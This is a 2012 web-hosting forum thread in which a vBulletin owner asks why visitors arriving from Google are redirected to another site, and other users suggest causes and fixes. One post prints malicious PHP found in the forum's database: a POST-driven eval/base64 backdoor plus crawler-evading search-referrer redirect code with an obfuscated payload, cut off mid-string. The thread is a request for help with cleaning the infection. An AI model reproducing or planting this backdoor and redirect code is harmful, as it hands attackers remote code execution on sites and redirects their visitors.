hosted by liquidweb


Go Back   Web Hosting Talk : Web Hosting Main Forums : Web Design and Content : vbulletin/vbseo hacked?
Reply

Forum Jump

vbulletin/vbseo hacked?

Reply Post New Thread In Web Design and Content Subscription
 
Send news tip View All Posts Thread Tools Search this Thread Display Modes
  #1  
Old 02-28-2012, 06:53 AM
mikewiz mikewiz is offline
Newbie
 
Join Date: May 2011
Posts: 15

vbulletin/vbseo hacked?


Hello,

i have very strange problem with my vbulletin board (3.8.7). The problem is Google Re-Direct clicks to my forum to MyFileStore.com. I read everything on vbseo and vbulletin boards and reinstalled vbseo, which is supposedly causing the problem. But today the problem came back.

Any ideas?



Sponsored Links
  #2  
Old 02-28-2012, 07:35 AM
AmethystNetworks AmethystNetworks is offline
Junior Guru Wannabe
 
Join Date: Feb 2012
Posts: 60
Have you tried contacting vb about the issue? There may be a known exploit that they have a security patch for

  #3  
Old 02-28-2012, 11:57 AM
KMyers KMyers is online now
Technical Nutcase
 
Join Date: Mar 2009
Location: Miami, Florida
Posts: 18,533
Hello,
Are you sure it is not an issue with your machine? I have seen rogue anti-viruses and adware re-direct google searches. Can you try it on another computer?

__________________
Keith M.- CTO
VPS | Cloud Resource Pools | Dedicated Servers | Colocation
99.999% Uptime | 24x7x365 Support | onApp Powered Cloud | Global Data Centers
Big Brain Global Networks | A Division of Big Brain, LLC

Sponsored Links
  #4  
Old 02-28-2012, 12:06 PM
cpanellover cpanellover is offline
Aspiring Evangelist
 
Join Date: Aug 2005
Location: behind my screen
Posts: 402
this sounds like that vbSeo exploit from months ago are you sure you run the latest availible versions ?

  #5  
Old 02-28-2012, 01:24 PM
mikewiz mikewiz is offline
Newbie
 
Join Date: May 2011
Posts: 15
Quote:
Originally Posted by cpanellover View Post
this sounds like that vbSeo exploit from months ago are you sure you run the latest availible versions ?
I thought the same, so i reinstalled Vbseo three days ago. But today i saw the redirection again.

  #6  
Old 02-29-2012, 01:49 AM
philipdaniel philipdaniel is offline
Web Hosting Master
 
Join Date: Aug 2011
Posts: 720
There is Support section in vbseo. So you can discuss your problem there. I am agree with KMyers. There are some free software and anti virus which re-direct google searches to a particular sites.

  #7  
Old 02-29-2012, 03:40 AM
cpanellover cpanellover is offline
Aspiring Evangelist
 
Join Date: Aug 2005
Location: behind my screen
Posts: 402
hi,

1)check vbulletin.com for security patches
2)temporarly disable custom plugins
3) redirection gone ? good not gone ? well.....
4)you have a problem on the server that needs to be investigated by somebody with full access

  #8  
Old 02-29-2012, 01:09 PM
mikewiz mikewiz is offline
Newbie
 
Join Date: May 2011
Posts: 15
My admin just found this code in MySQL (datastore, plugins)

Code:
if(isset($_POST[$x]))eval(base64_decode(str_rot13($_POST[$x])));unset($x);
ini_set('display_errors',0);ini_set('log_errors',0);
$r=!empty($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : getenv('HTTP_REFERER');
if(strlen($r)>10)
{
$ip=$_SERVER['REMOTE_ADDR'];$hn=@gethostbyaddr($ip);
if((strpos($ip,'65.55.')!==0)&&(strpos($hn,'msnbot')===false))
{
        $s=array('search.live.com','www.google','search.yahoo.com','www.bing.com','yandex.ru','baidu.com');
        foreach($s as $e)
        {
                if((strpos($r,$e)!==false)&&(empty($_COOKIE['vbsp'])))
                {
                        $h=strtoupper(substr(@md5($_SERVER['HTTP_HOST']),0,8));
                        die("<html><head></head><body><script type=\"text/javascript\">var vbsp='$h';".str_replace('\\','\\\\',gzinflate(base64_decode('XVLbctowFPwVmpmOpLFDuBgMcd1MQqBN703avlhqRwgBDmAcYy6J5X/vihQmU9vHZ7V7LvsgvZFzOl

Is this related to any known issue?

  #9  
Old 02-29-2012, 01:28 PM
cpanellover cpanellover is offline
Aspiring Evangelist
 
Join Date: Aug 2005
Location: behind my screen
Posts: 402
that is exploit code disable base64_encode and base64_decode PHP functions in php.ini do remember that vBulletin uses those itself on upgrades/installs so you need to renable them if you are going to upgrade/install also "register_globals = off" in php.ini restart the server after editing php.ini the "@" you see before PHP functions calls cause that script to throw no errormessage if the function fails.Also have you seen this

http://www.vbseo.com/f5/vbseo-securi...3/index12.html


Last edited by cpanellover; 02-29-2012 at 01:35 PM.
  #10  
Old 02-29-2012, 02:55 PM
mikewiz mikewiz is offline
Newbie
 
Join Date: May 2011
Posts: 15
1.) So if this "virus code" is in "datastore", then if i disable/enable any plugin, datastore will be cleared and "virus code" will vanish?

2.) But from what i understand, it will come back and attach "virus code" again. So how do i find it source and delete it completely?

Do i understand that correctly?


Last edited by mikewiz; 02-29-2012 at 03:01 PM.
  #11  
Old 02-29-2012, 03:10 PM
cpanellover cpanellover is offline
Aspiring Evangelist
 
Join Date: Aug 2005
Location: behind my screen
Posts: 402
Quote:
Originally Posted by mikewiz View Post
1.) So if this "virus code" is in "datastore", then if i disable/enable any plugin, datastore will be cleared and "virus code" will vanish?

2.) But from what i understand, it will come back and attach "virus code" again. So how do i find it source and delete it completely?

Do i understand that correctly?
The best thing you can do is contact vBulletin support the creators of the product are the most qualified to tell you howto deal with this.It's possible it comes back but be carefull with the datastore if you do anything wrong it might corrupt your database and your board will stop working.Ask Steve at vbulletin.com he is verry smart with things like this.it might not be vbSeo look here what yui library version are you running ? try in your vBulletin control panel

  1. Admin CP >> Settings >> Options >> Server Settings and Optimization Options
  2. Scroll down to Use Remote YUI
  3. Set this to Google


Last edited by cpanellover; 02-29-2012 at 03:16 PM.
  #12  
Old 03-03-2012, 09:59 AM
Xarwin Xarwin is offline
Junior Guru Wannabe
 
Join Date: Mar 2012
Posts: 31
Also have a check on your .htaccess file.
It might be vulnerable.

Reply

Similar Threads
Thread Thread Starter Forum Replies Last Post
vBSEO and vBulletin teck Software & Scripts Offers 17 04-08-2011 02:18 AM
vbulletin + vbseo managed hosting. IsMaR Managed Hosting and Services 15 11-06-2010 11:22 PM
vBSEO and vBulletin Owned License for Sale (with +2 years upgrades & vBulletin Blogs) NameRegion Software & Scripts Offers 12 11-08-2008 10:50 AM
vBulletin + vbSEO + drupal vjai Dedicated Server 10 02-26-2008 10:37 PM
vBulletin and vBSEO - best host ? vjai Web Hosting 16 02-24-2008 02:15 PM

Related posts from TheWhir.com
Title Type Date Posted
GCHQ, Not NSA, Behind Belgian Telecom Attack: Report Web Hosting News 2013-09-20 12:16:20
Reports Suggest NSA Behind Attack on Belgium's Largest Telecom Web Hosting News 2013-09-16 10:33:22
Could Website Hackers be Chasing Hosting Customers Away? Blog 2013-08-27 09:07:42
Syrian Electronic Army Targets Top US Media Websites in Outbrain Platform Hack Web Hosting News 2013-08-16 10:46:10
SwaggSec Hackers Release 900 Admin Credentials from China Telecom Attack Web Hosting News 2012-06-04 15:24:03


Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes
Postbit Selector

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off

Forum Jump
Login:
Log in with your username and password
Username:
Password:



Forgot Password?
Advertisement:
Web Hosting News:



 

X

Welcome to WebHostingTalk.com

Create your username to jump into the discussion!

WebHostingTalk.com is the largest, most influentual web hosting community on the Internet. Join us by filling in the form below.


(4 digit year)

Already a member?